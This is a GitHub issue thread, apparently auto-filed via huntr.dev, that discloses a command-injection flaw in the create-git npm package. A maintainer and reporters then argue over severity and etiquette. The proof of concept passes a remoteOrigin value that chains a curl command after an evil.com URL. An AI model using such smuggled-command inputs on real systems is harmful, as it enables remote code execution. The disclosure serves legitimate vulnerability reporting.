### ISSUE TITLE
Security Notice & Bug Bounty - Remote Code Execution - huntr.dev

### ISSUE THREAD

**Issue by huntr-helper** [wesleytodd/create-git#43]
This issue has been generated on-behalf of Mik317 (https://huntr.dev/app/users/Mik317)

## Vulnerability Description
The issue arises because some `user supplied` inputs are formatted inside commands executed lately without any check. Issue arises on this line: https://github.com/wesleytodd/create-git/blob/master/index.js#L85

## POC

```js
// poc.js
const createGit = require('create-git')
 
createGit({
    ignoreExisting: true,
    initialCommitMessage: 'test',
    remoteOrigin: 'http://evil.com || curl "http://localhost/RCE"',
    ignoreTemplates: ['Node.gitignore']
  })
```

## Impact
`RCE` via `insecure command formatting` on `create-git`

# Bug Bounty

We have opened up a bounty for this issue on our bug bounty platform. Want to solve this vulnerability and get rewarded 💰? Go to https://huntr.dev/

We will submit a pull request directly to your repository with the fix as soon as possible. Want to learn more? Go to https://github.com/418sec/huntr 📚

_Automatically generated by @huntr-helper..._

**Comment by wesleytodd** [comment]
Don't use this with untrusted input, that is not what it was designed to do, nor is it supported usage.

**Comment by wesleytodd** [comment]
Also, I am happy to field a PR which sanitizes input.

**Comment by DanielRuf** [comment]
We will keep you updated.

You can edit the content of the first comment / issue description, remove it and the revision and maybe ask GitHub to delete it completely, if necessary / needed.

**Comment by wesleytodd** [comment]
As I don't think this is really a CVE, I decided to leave the content.  If nothing else it is a warning to anyone using this package not to use it in that way 😄

**Comment by DanielRuf** [comment]
To be technically exact, it is a CWE. Not a CVE. A CVE is just a specific CWE for a specific product with  unique identifier. Nothing to worry about right now.

Which are undoubtedly these:

https://cwe.mitre.org/data/definitions/77.html
https://cwe.mitre.org/data/definitions/78.html
...

Oh and I saw all the recent replies at Twitter. I'm not quoting them here. Me and others from the Nodejs Security WG are aware of them.

Besides this, even if you or any "normal" user reports such findings at npmjs.com, the npm team will escalate it too (with strict timelines) and publish an advisory (something that you mentioned that you do not like, not all CVEs automatically land in the advisories of npmjs, they have their own processes). Same for GitHub. And we do have only good intentions.

**Comment by Mik317** [comment]
Just wanted to point out that the issue here and the report on H1 weren't finalized to a CVE (it would have been assigned only if the team would have accepted this, as per policy), but making aware the creator of an issue in his package which, more or less serious, in my opinion should have been fixed (and in the opinion of many more people who reviewed and accepted the issue).

@wesleytodd  I don't find a valid motivation for making so much noise on Twitter, wasting your time, while you could simply replace `exec` with `execFile` in __1 month__ (busy to fix 2 lines of code but not to make an entire thread on Twitter)...

I'm very disappointed to see such behaviors and rude people, but fortunately you're only one in confront to the tide of very kind and available people I worked with, and that's what empowers OSS community.
Also, since you and the few people who follow you, think the notification are quite difficult to ignore, because you're right and don't want to show how you care about your software that will be used by others (module == to integrate == implementation agnostic ... that's basic logic), you can simply `disable issues` and everything is ok (https://docs.github.com/en/enterprise/2.15/user/articles/disabling-issues).

**Comment by huntr-helper** [comment]
‎‍🛠️ A fix has been provided for this issue. Please reference: https://github.com/418sec/create-git/pull/2

🔥 This fix has been provided through the https://huntr.dev/ bug bounty platform.

**Comment by huntr-helper** [comment]
### Bug Bounty

We have opened up a bounty for this issue on our bug bounty platform. Want to solve this vulnerability? Go to https://huntr.dev/

We will submit a pull request directly to your repository with the fix as soon as possible. Want to learn more? Go to https://github.com/418sec/huntr 📚

_Automatically generated by @huntr-helper..._

**Comment by huntr-helper** [comment]
### Bug Bounty

We have opened up a bounty for this issue on our bug bounty platform. Want to solve this vulnerability? Go to https://huntr.dev/

We will submit a pull request directly to your repository with the fix as soon as possible. Want to learn more? Go to https://github.com/418sec/huntr 📚

_Automatically generated by @huntr-helper..._
